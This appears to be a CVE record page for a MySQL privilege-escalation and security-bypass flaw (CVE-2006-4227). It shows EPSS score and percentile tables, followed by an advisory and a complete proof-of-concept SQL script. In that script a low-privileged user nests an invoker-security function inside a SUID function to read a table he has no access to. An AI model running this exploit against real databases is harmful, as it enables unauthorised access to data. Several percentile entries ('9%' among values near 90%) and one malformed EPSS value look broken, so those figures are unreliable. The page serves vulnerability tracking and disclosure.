CVE-2006-4227 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	10.86%	–	–
2022-03-06	–	–	10.86%	–	–
2022-04-03	–	–	10.86%	–	–
2022-07-17	–	–	10.86%	–	–
2022-07-24	–	–	10.86%	–	–
2022-09-25	–	–	10.86%	–	–
2023-01-01	–	–	10.86%	–	–
2023-01-15	–	–	10.86%	–	–
2023-03-12	–	–	–	2.38%	–
2023-04-09	–	–	–	2.32%	–
2023-05-21	–	–	–	1.8%	–
2023-06-25	–	–	–	3.16%	–
2023-07-30	–	–	–	3.08%	–
2023-11-26	–	–	–	2.75%	–
2023-12-24	–	–	–	2.75%	–
2024-01-07	–	–	–	2.75%	–
2024-01-14	–	–	–	3.16%	–
2024-02-11	–	–	–	3.16%	–
2024-03-03	–	–	–	3.8%	–
2024-06-02	–	–	–	4.92%	–
2024-07-14	–	–	–	7.99%	–
2024-11-17	–	–	–	7.99%	–
2024-12-08	–	–	–	10.74%	–
2024-12-22	–	–	–	3.12%	–
2025-01-19	–	–	–	3.12%	–
2025-03-18	–	–	–	–	10.14%
2025-03-30	–	–	–	–	10.14%
2025-04-06	–	–	–	–	12.59%
2025-04-15	–	–	–	–	12.59%
2025-04-15	–	–	–	–	12.59,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	88%
2022-03-06	89%
2022-04-03	94%
2022-07-17	95%
2022-07-24	94%
2022-09-25	95%
2023-01-01	94%
2023-01-15	95%
2023-03-12	88%
2023-04-09	88%
2023-05-21	86%
2023-06-25	9%
2023-07-30	9%
2023-11-26	89%
2023-12-24	9%
2024-01-07	89%
2024-01-14	9%
2024-02-11	91%
2024-03-03	92%
2024-06-02	93%
2024-07-14	94%
2024-11-17	95%
2024-12-08	95%
2024-12-22	91%
2025-01-19	91%
2025-03-18	93%
2025-03-30	92%
2025-04-06	93%
2025-04-15	94%
2025-04-15	94%

source: https://www.securityfocus.com/bid/19559/info MySQL is prone to these vulnerabilities: - A privilege-elevation vulnerability. A user with privileges to execute SUID routines may gain elevated privileges by executing certain commands and code with higher privileges. - A security-bypass vulnerability. A user can bypass restrictions and create new databases. MySQL 5.0.24 and prior versions are affected by these issues. --disable_warnings drop database if exists mysqltest1; drop database if exists mysqltest2; drop function if exists f_suid; --enable_warnings # Prepare playground create database mysqltest1; create database mysqltest2; create user malory@localhost; grant all privileges on mysqltest1.* to malory@localhost; # Create harmless (but SUID!) function create function f_suid(i int) returns int return 0; grant execute on function test.f_suid to malory@localhost; use mysqltest2; # Create table in which malory@localhost will be interested but to which # he won't have any access create table t1 (i int); connect (malcon, localhost, malory,,mysqltest1); # Correct malory@localhost don't have access to mysqltest2.t1 --error ER_TABLEACCESS_DENIED_ERROR select * from mysqltest2.t1; # Create function which will allow to exploit security hole delimiter |; create function f_evil () returns int sql security invoker begin set @a:= current_user(); set @b:= (select count(*) from mysqltest2.t1); return 0; end| delimiter ;| # Again correct --error ER_TABLEACCESS_DENIED_ERROR select f_evil(); select @a, @b; # Oops!!! it seems that f_evil() is executed in the context of # f_suid() definer, so malory@locahost gets all info that he wants select test.f_suid(f_evil()); select @a, @b; connection default; drop user malory@localhost; drop database mysqltest1; drop database mysqltest2;